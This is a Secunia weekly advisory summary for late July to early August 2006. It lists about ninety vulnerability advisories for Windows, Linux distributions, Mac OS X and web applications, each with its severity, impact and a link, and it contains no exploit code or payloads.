Secunia Weekly Summary - Issue: 2006-31

========================================================================

                  The Secunia Weekly Advisory Summary                  
                        2006-07-27 - 2006-08-03                        

                       This week: 90 advisories                        

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3...............................This Week's Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

Secunia Survey Feedback

Secunia would like to inform you that the Secunia Survey has been
brought to an end and that the winners of our prize draw have been
found. The winners are living in California and the United Kingdom;
both have received their iPod nanos.

The overall survey feedback was positive and the results showed a
confidence in Secunia's ability to keep you well-informed with highly
reliable information. We are very grateful for that.

Though there tends to be a lack of knowledge about our commercial
solutions, in the sense that 60% of the respondents valued filtered
and real-time advisories - a solution Secunia already provides
businesses today:

The Secunia Security Manager Product:
http://secunia.com/security_manager/menu=prod

Request An Account:
https://ca.secunia.com/?page=requestaccount&f=ssum

Again we would like to thank you all for participating.

Best regards, 
Niels Henrik Rasmussen
CEO Secunia

========================================================================
2) This Week in Brief:

Apple has issued a security update for Mac OS X, which fixes multiple
vulnerabilities.

Please refer to the referenced Secunia advisory for a comprehensive
listing of the issues corrected with this update.

Reference:
http://secunia.com/SA21253

 --

A vulnerability has been discovered in Safari, which potentially can be
exploited by malicious people to compromise a user's system.

Currently, no vendor solution is available. See the referenced Secunia
advisory for an alternative workaround.

Reference:
http://secunia.com/SA21271

 --

A vulnerability has been reported in various McAfee products, which
can be exploited by malicious people to compromise a vulnerable system.

Successful exploitation allows execution of arbitrary code when a user
visits a malicious web site.

Reference:
http://secunia.com/SA21264

 --

A vulnerability has been reported in Apache HTTP Server, which
potentially can be exploited by malicious people to compromise a
vulnerable system.

The vulnerability is caused by an off-by-one error in mod_rewrite within
the ldap scheme handling and can be exploited to cause a one-byte
buffer overflow.

The vendor has released an updated version that fixes this
vulnerability.

Reference:
http://secunia.com/SA21197

 --

VIRUS ALERTS:

During the past week Secunia collected 142 virus descriptions from the
Antivirus vendors. However, none were deemed MEDIUM risk or higher
according to the Secunia assessment scale.

========================================================================
3) This Week's Top Ten Most Read Advisories:

1.  [SA19873] Mozilla Firefox Multiple Vulnerabilities
2.  [SA21197] Apache mod_rewrite Off-By-One Buffer Overflow
              Vulnerability
3.  [SA21228] Mozilla Thunderbird Multiple Vulnerabilities
4.  [SA21172] Apache "Expect" Header Cross-Site Scripting Vulnerability
5.  [SA20153] Microsoft Word Malformed Object Pointer Vulnerability
6.  [SA20748] Microsoft Windows Hyperlink Object Library Buffer
              Overflow
7.  [SA21264] McAfee SecurityCenter Unspecified Code Execution
              Vulnerability
8.  [SA21276] Microsoft Windows Server Driver Denial of Service
              Vulnerability
9.  [SA21200] Check Point VPN/Firewall Directory Traversal
              Vulnerability
10. [SA21251] Sun Java System Application Server / Web Server File
              Disclosure

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA21264] McAfee SecurityCenter Unspecified Code Execution
Vulnerability
[SA21256] Lhaplus "extended header size" Buffer Overflow
[SA21276] Microsoft Windows Server Driver Denial of Service
Vulnerability
[SA21280] Symantec On-Demand Agent Weak Encryption

UNIX/Linux:
[SA21324] Debian update for mozilla-thunderbird
[SA21275] Ubuntu update for thunderbird
[SA21271] Safari "KHTMLParser::popOneBlock()" Memory Corruption
[SA21270] Red Hat update for firefox
[SA21269] Red Hat update for thunderbird
[SA21262] SGI Advanced Linux Environment Multiple Updates
[SA21261] Mandriva update for libwmf
[SA21253] Mac OS X Security Update Fixes Multiple Vulnerabilities
[SA21250] rPath update for thunderbird
[SA21249] Debian update for ethereal
[SA21246] Red Hat update for seamonkey
[SA21243] Ubuntu update for firefox
[SA21338] Ubuntu update for tiff
[SA21334] Debian update for tiff
[SA21329] rPath update for gnupg
[SA21323] Debian update for libtunepimp
[SA21319] SUSE update for libtiff
[SA21315] Gentoo update for apache
[SA21313] Debian update for apache
[SA21307] OpenBSD update for httpd
[SA21300] Red Hat update for gnupg
[SA21295] Gentoo update for audacious
[SA21290] Red Hat update for libtiff
[SA21285] SUSE update for freetype2
[SA21284] Debian update for apache2
[SA21278] Gentoo update for OpenOffice.org
[SA21277] Gentoo tunepimp Release Date Lookup Buffer Overflow
[SA21274] rPath update for libtiff
[SA21273] Mandriva update for apache
[SA21266] Slackware update for apache
[SA21254] Mandriva update for freeciv
[SA21252] Red Hat Stronghold updates for uw-imap and PHP
[SA21247] rPath update for httpd and mod_ssl
[SA21245] SUSE update for apache
[SA21244] Debian update for drupal
[SA21241] Ubuntu update for apache
[SA21238] Audacious AdPlug Multiple Buffer Overflow Vulnerabilities
[SA21232] Ubuntu update for freetype
[SA21265] Debian update for osiris
[SA21272] Mandriva update for ruby
[SA21248] Debian update for sitebar
[SA21236] Red Hat update for ruby
[SA21233] Ubuntu update for ruby
[SA21240] Debian update for heartbeat
[SA21231] Ubuntu update for heartbeat

Other:
[SA21279] Sun Fire T2000 Incorrect DSA Signature Verification
[SA21258] Barracuda Spam Firewall Information Disclosure and Default
Account

Cross Platform:
[SA21314] Knusperleicht NewsLetter "NL_PATH" File Inclusion
[SA21312] Knusperleicht newsReporter "news_include_path" File
Inclusion
[SA21305] Joomla UHP Component File Inclusion Vulnerabilities
[SA21302] Knusperleicht Shoutbox "sb_include_path" File Inclusion
[SA21294] Knusperleicht FileManager "dwl_include_path" File Inclusion
[SA21292] Mambo Mambatstaff Component File Inclusion Vulnerability
[SA21291] TSEP "tsep_config[absPath]" File Inclusion Vulnerability
[SA21289] Easy File Sharing FTP Server "PASS" Buffer Overflow
[SA21288] Joomla Colophon Component File Inclusion Vulnerability
[SA21268] Mambo MGM Component File Inclusion Vulnerability
[SA21263] MyNewsGroups :) "myng_root" File Inclusion Vulnerability
[SA21260] Joomla Security Images Component File Inclusion
[SA21234] WMNews "data_basepath" File Inclusion Vulnerability
[SA21229] Mozilla SeaMonkey Multiple Vulnerabilities
[SA21228] Mozilla Thunderbird Multiple Vulnerabilities
[SA21340] Geodesic Solutions Products "b" Parameter SQL Injection
[SA21325] GeoAuctions Enterprise "d" Parameter SQL Injection
[SA21309] WordPress Unspecified Vulnerabilities
[SA21308] ATutor SQL Injection Vulnerabilities
[SA21304] libTIFF Multiple Vulnerabilities
[SA21303] BomberClone Multiple Vulnerabilities
[SA21297] GnuPG "parse_comment" Denial of Service Vulnerability
[SA21293] XMB "u2uid" SQL Injection Vulnerability
[SA21287] vbPortal "bbvbplang" Local File Inclusion Vulnerability
[SA21286] Ajax Chat Cross-Site Scripting and Information Disclosure
[SA21283] xpoll "poll" Parameter SQL Injection Vulnerability
[SA21282] X-Protection protect.php SQL Injection Vulnerabilities
[SA21281] X-Statistics "User-Agent" HTTP Header SQL Injection
[SA21267] Open Cubic Player Multiple Buffer Overflows
[SA21251] Sun Java System Application Server / Web Server File
Disclosure
[SA21301] Informix Dynamic Server Multiple Vulnerabilities
[SA21257] Osiris Format String Vulnerabilities
[SA21296] AWBS Cross-Site Scripting Vulnerabilities
[SA21242] Taskjitsu Cross-Site Scripting and Script Insertion
Vulnerabilities
[SA21239] Dokeos Unspecified Cross-Site Scripting Vulnerabilities
[SA21237] GeoClassifieds Enterprise Cross-Site Scripting
Vulnerabilities
[SA21235] TWiki "TYPEOF" Arbitrary Command Execution Vulnerability
[SA21230] VMware ESX Server Multiple Vulnerabilities
[SA21259] MySQL MERGE Table Privilege Revoke Bypass

========================================================================
5) Vulnerabilities Content Listing

Windows:--

[SA21264] McAfee SecurityCenter Unspecified Code Execution
Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-08-01

eEye Digital Security has reported a vulnerability in various McAfee
products, which can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/21264/

 --

[SA21256] Lhaplus "extended header size" Buffer Overflow

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2006-08-01

Tan Chew Keong has reported a vulnerability in Lhaplus, which can be
exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21256/

 --

[SA21276] Microsoft Windows Server Driver Denial of Service
Vulnerability

Critical:    Less critical
Where:       From local network
Impact:      DoS
Released:    2006-07-31

ISS X-Force has discovered a vulnerability in Microsoft Windows, which
can be exploited by malicious people to cause a DoS (Denial of
Service).

Full Advisory:
http://secunia.com/advisories/21276/

 --

[SA21280] Symantec On-Demand Agent Weak Encryption

Critical:    Less critical
Where:       Local system
Impact:      Exposure of sensitive information
Released:    2006-08-02

A security issue has been reported in Symantec On-Demand Agent, which
can be exploited by malicious, local users to disclose potentially
sensitive information.

Full Advisory:
http://secunia.com/advisories/21280/


UNIX/Linux:--

[SA21324] Debian update for mozilla-thunderbird

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, System access
Released:    2006-08-02

Debian has issued an update for mozilla-thunderbird. This fixes some
vulnerabilities, which can be exploited by malicious people to bypass
certain security restrictions, conduct cross-site scripting and HTTP
response smuggling attacks, and potentially compromise a user's
system.

Full Advisory:
http://secunia.com/advisories/21324/

 --

[SA21275] Ubuntu update for thunderbird

Critical:    Highly critical
Where:       From remote
Impact:      Cross Site Scripting, DoS, System access
Released:    2006-07-31

Ubuntu has issued an update for thunderbird. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting attacks and compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21275/

 --

[SA21271] Safari "KHTMLParser::popOneBlock()" Memory Corruption

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-07-31

A vulnerability has been discovered in Safari, which potentially can be
exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21271/

 --

[SA21270] Red Hat update for firefox

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, DoS, System access
Released:    2006-07-31

Red Hat has issued an update for firefox. This fixes some
vulnerabilities, which can be exploited by malicious people to bypass
certain security restrictions, conduct cross-site scripting and HTTP
response smuggling attacks, and potentially compromise a user's
system.

Full Advisory:
http://secunia.com/advisories/21270/

 --

[SA21269] Red Hat update for thunderbird

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, DoS, System access
Released:    2006-07-31

Red Hat has issued an update for thunderbird. This fixes some
vulnerabilities, which can be exploited by malicious people to bypass
certain security restrictions, conduct cross-site scripting and HTTP
response smuggling attacks, and potentially compromise a user's
system.

Full Advisory:
http://secunia.com/advisories/21269/

 --

[SA21262] SGI Advanced Linux Environment Multiple Updates

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Exposure of
sensitive information, Privilege escalation, DoS, System access
Released:    2006-08-01

SGI has issued a patch for SGI Advanced Linux Environment. This fixes
some vulnerabilities, which can be exploited by malicious, local users
to gain escalated privileges or perform certain actions with escalated
privileges, by malicious users to access the system from IPs that they
were not supposed to, and by malicious people to conduct cross-site
scripting attacks, disclose certain sensitive information, cause a DoS
(Denial of Service), or compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21262/

 --

[SA21261] Mandriva update for libwmf

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-07-31

Mandriva has issued an update for libwmf. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise an
application using the vulnerable library.

Full Advisory:
http://secunia.com/advisories/21261/

 --

[SA21253] Mac OS X Security Update Fixes Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Exposure of system
information, Exposure of sensitive information, Privilege escalation,
DoS, System access
Released:    2006-08-02

Apple has issued a security update for Mac OS X, which fixes multiple
vulnerabilities.

Full Advisory:
http://secunia.com/advisories/21253/

 --

[SA21250] rPath update for thunderbird

Critical:    Highly critical
Where:       From remote
Impact:      Cross Site Scripting, DoS, System access
Released:    2006-07-28

rPath has issued an update for thunderbird. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting attacks and compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21250/

 --

[SA21249] Debian update for ethereal

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-07-28

Debian has issued an update for ethereal. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21249/

 --

[SA21246] Red Hat update for seamonkey

Critical:    Highly critical
Where:       From remote
Impact:      Cross Site Scripting, DoS, System access
Released:    2006-07-28

Red Hat has issued an update for seamonkey. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting attacks and compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21246/

 --

[SA21243] Ubuntu update for firefox

Critical:    Highly critical
Where:       From remote
Impact:      Cross Site Scripting, DoS, System access
Released:    2006-07-28

Ubuntu has issued an update for firefox. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting attacks or compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21243/

 --

[SA21338] Ubuntu update for tiff

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-08-03

Ubuntu has issued an update for tiff. This fixes some vulnerabilities,
which can be exploited by malicious people to cause a DoS (Denial of
Service) or potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21338/

 --

[SA21334] Debian update for tiff

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-08-03

Debian has issued an update for tiff. This fixes some vulnerabilities,
which can be exploited by malicious people to cause a DoS (Denial of
Service) or potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21334/

 --

[SA21329] rPath update for gnupg

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2006-08-03

rPath has issued an update for gnupg. This fixes a vulnerability, which
can be exploited by malicious people to cause a DoS (Denial of
Service).

Full Advisory:
http://secunia.com/advisories/21329/

 --

[SA21323] Debian update for libtunepimp

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2006-08-02

Debian has issued an update for libtunepimp. This fixes a
vulnerability, which potentially can be exploited by malicious people
to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21323/

 --

[SA21319] SUSE update for libtiff

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-08-02

SUSE has issued an update for libtiff. This fixes some vulnerabilities,
which can be exploited by malicious people to cause a DoS (Denial of
Service) or potentially compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21319/

 --

[SA21315] Gentoo update for apache

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-08-02

Gentoo has issued an update for apache. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/21315/

 --

[SA21313] Debian update for apache

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-08-02

Debian has issued an update for apache. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/21313/

 --

[SA21307] OpenBSD update for httpd

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-07-31

OpenBSD has issued an update for httpd. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/21307/

 --

[SA21300] Red Hat update for gnupg

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2006-08-02

Red Hat has issued an update for gnupg. This fixes a vulnerability,
which can be exploited by malicious people to cause a DoS (Denial of
Service).

Full Advisory:
http://secunia.com/advisories/21300/

 --

[SA21295] Gentoo update for audacious

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-07-31

Gentoo has issued an update for audacious. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21295/

 --

[SA21290] Red Hat update for libtiff

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-08-02

Red Hat has issued an update for libtiff. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or potentially compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21290/

 --

[SA21285] SUSE update for freetype2

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-08-02

SUSE has issued an update for freetype2. This fixes a vulnerability,
which can be exploited by malicious people to cause a DoS (Denial of
Service) and potentially compromise applications using the library.

Full Advisory:
http://secunia.com/advisories/21285/

 --

[SA21284] Debian update for apache2

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-08-02

Debian has issued an update for apache2. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/21284/

 --

[SA21278] Gentoo update for OpenOffice.org

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2006-07-31

Gentoo has issued an update for OpenOffice.org. This fixes some
vulnerabilities, which can be exploited by malicious people to
compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21278/

 --

[SA21277] Gentoo tunepimp Release Date Lookup Buffer Overflow

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2006-08-01

Gentoo has acknowledged a vulnerability in tunepimp, which potentially
can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21277/

 --

[SA21274] rPath update for libtiff

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-08-02

rPath has issued an update for libtiff. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21274/

 --

[SA21273] Mandriva update for apache

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-07-31

Mandriva has issued an update for apache. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/21273/

 --

[SA21266] Slackware update for apache

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-07-31

Slackware has issued an update for apache. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/21266/

 --

[SA21254] Mandriva update for freeciv

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2006-08-01

Mandriva has issued an update for freeciv. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/21254/

 --

[SA21252] Red Hat Stronghold updates for uw-imap and PHP

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, System access
Released:    2006-07-28

Red Hat has issued updates for uw-imap and PHP. These fix some
vulnerabilities, which can be exploited by malicious, local users to
bypass certain security restrictions, or by malicious people to bypass
certain security restrictions, conduct cross-site scripting attacks, or
compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21252/

 --

[SA21247] rPath update for httpd and mod_ssl

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-07-31

rPath has issued updates for httpd and mod_ssl. These fix a
vulnerability, which potentially can be exploited by malicious people
to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21247/

 --

[SA21245] SUSE update for apache

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-07-31

SUSE has issued an update for apache. This fixes a vulnerability, which
potentially can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/21245/

 --

[SA21244] Debian update for drupal

Critical:    Moderately critical
Where:       From remote
Impact:      System access, Manipulation of data, Cross Site Scripting
Released:    2006-07-28

Debian has issued an update for drupal. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting and SQL injection attacks, and by malicious users
to potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21244/

 --

[SA21241] Ubuntu update for apache

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-07-28

Ubuntu has issued an update for apache. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/21241/

 --

[SA21238] Audacious AdPlug Multiple Buffer Overflow Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-07-31

Some vulnerabilities have been reported in Audacious, which can be
exploited by malicious people to cause a DoS (Denial of Service) or
compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21238/

 --

[SA21232] Ubuntu update for freetype

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-07-28

Ubuntu has issued an update for freetype. This fixes a vulnerability,
which can be exploited by malicious people to cause a DoS (Denial of
Service) and potentially compromise applications using the library.

Full Advisory:
http://secunia.com/advisories/21232/

 --

[SA21265] Debian update for osiris

Critical:    Moderately critical
Where:       From local network
Impact:      DoS, System access
Released:    2006-08-01

Debian has issued an update for osiris. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21265/

 --

[SA21272] Mandriva update for ruby

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-07-31

Mandriva has issued an update for ruby. This fixes some
vulnerabilities, which can be exploited by malicious people to bypass
certain security restrictions.

Full Advisory:
http://secunia.com/advisories/21272/

 --

[SA21248] Debian update for sitebar

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-08-02

Debian has issued an update for sitebar. This fixes a vulnerability,
which can be exploited by malicious people to conduct cross-site
scripting attacks.

Full Advisory:
http://secunia.com/advisories/21248/

 --

[SA21236] Red Hat update for ruby

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-07-28

Red Hat has issued an update for Ruby. This fixes some vulnerabilities,
which can be exploited by malicious people to bypass certain security
restrictions.

Full Advisory:
http://secunia.com/advisories/21236/

 --

[SA21233] Ubuntu update for ruby

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-07-28

Ubuntu has issued an update for ruby. This fixes some vulnerabilities,
which can be exploited by malicious people to bypass certain security
restrictions.

Full Advisory:
http://secunia.com/advisories/21233/

 --

[SA21240] Debian update for heartbeat

Critical:    Not critical
Where:       Local system
Impact:      DoS
Released:    2006-07-28

Debian has issued an update for heartbeat. This fixes a vulnerability,
which can be exploited by malicious, local users to cause a DoS (Denial
of Service).

Full Advisory:
http://secunia.com/advisories/21240/

 --

[SA21231] Ubuntu update for heartbeat

Critical:    Not critical
Where:       Local system
Impact:      DoS
Released:    2006-07-28

Ubuntu has issued an update for heartbeat. This fixes a vulnerability,
which can be exploited by malicious, local users to cause a DoS (Denial
of Service).

Full Advisory:
http://secunia.com/advisories/21231/


Other:--

[SA21279] Sun Fire T2000 Incorrect DSA Signature Verification

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-08-02

A security issue has been reported in Sun Fire T2000, which potentially
can be exploited by malicious people to bypass certain security
restrictions.

Full Advisory:
http://secunia.com/advisories/21279/

 --

[SA21258] Barracuda Spam Firewall Information Disclosure and Default
Account

Critical:    Less critical
Where:       From local network
Impact:      Security Bypass, Exposure of system information, Exposure
of sensitive information
Released:    2006-08-02

Greg Sinclair has reported a vulnerability and a security issue in
Barracuda Spam Firewall, which can be exploited by malicious people to
bypass certain security restrictions and disclose various information.

Full Advisory:
http://secunia.com/advisories/21258/


Cross Platform:--

[SA21314] Knusperleicht NewsLetter "NL_PATH" File Inclusion

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-08-02

SHiKaA has discovered a vulnerability in Knusperleicht NewsLetter,
which can be exploited by malicious people to compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/21314/

 --

[SA21312] Knusperleicht newsReporter "news_include_path" File
Inclusion

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-08-02

Kurdish Security has discovered a vulnerability in Knusperleicht
newsReporter, which can be exploited by malicious people to compromise
a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21312/

 --

[SA21305] Joomla UHP Component File Inclusion Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-07-31

Kurdish Security has discovered some vulnerabilities in the UHP
component for Mambo, which can be exploited by malicious people to
compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21305/

 --

[SA21302] Knusperleicht Shoutbox "sb_include_path" File Inclusion

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-08-02

Kurdish Security has discovered a vulnerability in Knusperleicht
Shoutbox, which can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/21302/

 --

[SA21294] Knusperleicht FileManager "dwl_include_path" File Inclusion

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-08-02

SHiKaA has discovered a vulnerability in Knusperleicht FileManager,
which can be exploited by malicious people to compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/21294/

 --

[SA21292] Mambo Mambatstaff Component File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-07-31

Dr.Jr7 has discovered a vulnerability in the Mambatstaff component for
Mambo, which can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/21292/

 --

[SA21291] TSEP "tsep_config[absPath]" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-08-02

Philipp Niedziela has discovered a vulnerability in TSEP, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21291/

 --

[SA21289] Easy File Sharing FTP Server "PASS" Buffer Overflow

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-07-31

h07 has discovered a vulnerability in Easy File Sharing FTP Server,
which can be exploited by malicious people to compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/21289/

 --

[SA21288] Joomla Colophon Component File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-07-31

Drago84 has discovered a vulnerability in the Colophon component for
Joomla, which can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/21288/

 --

[SA21268] Mambo MGM Component File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-07-31

A-S-T TEAM has discovered a vulnerability in the MGM component for
Mambo, which can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/21268/

 --

[SA21263] MyNewsGroups :) "myng_root" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-08-01

Philipp Niedziela has discovered a vulnerability in MyNewsGroups :),
which can be exploited by malicious people to compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/21263/

 --

[SA21260] Joomla Security Images Component File Inclusion

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-07-31

Drago84 has discovered some vulnerabilities in the Security Images
component for Joomla, which can be exploited by malicious people to
compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21260/

 --

[SA21234] WMNews "data_basepath" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-07-27

uNfz has reported a vulnerability in WMNews, which can be exploited by
malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21234/

 --

[SA21229] Mozilla SeaMonkey Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Cross Site Scripting, DoS, System access
Released:    2006-07-27

Multiple vulnerabilities have been reported in Mozilla SeaMonkey, which
can be exploited by malicious people to conduct cross-site scripting
attacks and compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21229/

 --

[SA21228] Mozilla Thunderbird Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Cross Site Scripting, DoS, System access
Released:    2006-07-27

Multiple vulnerabilities have been reported in Mozilla Thunderbird,
which can be exploited by malicious people to conduct cross-site
scripting attacks and compromise a user's system.

Full Advisory:
http://secunia.com/advisories/21228/

 --

[SA21340] Geodesic Solutions Products "b" Parameter SQL Injection

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-08-03

LBDT has reported a vulnerability in GeoClassifieds Basic and
GeoAuctions Premier, which can be exploited by malicious people to
conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/21340/

 --

[SA21325] GeoAuctions Enterprise "d" Parameter SQL Injection

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-08-03

LBDT has reported a vulnerability in GeoAuctions Enterprise, which can
be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/21325/

 --

[SA21309] WordPress Unspecified Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Unknown
Released:    2006-07-31

Some vulnerabilities with unknown impacts have been reported in
WordPress.

Full Advisory:
http://secunia.com/advisories/21309/

 --

[SA21308] ATutor SQL Injection Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-08-01

rgod has reported two vulnerabilities in ATutor, which can be exploited
by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/21308/

 --

[SA21304] libTIFF Multiple Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-08-02

Some vulnerabilities have been reported in libTIFF, which can be
exploited by malicious people to cause a DoS (Denial of Service) or
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21304/

 --

[SA21303] BomberClone Multiple Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of system information, DoS
Released:    2006-07-31

Luigi Auriemma has reported some vulnerabilities in BomberClone, which
can be exploited by malicious people to gain knowledge of system
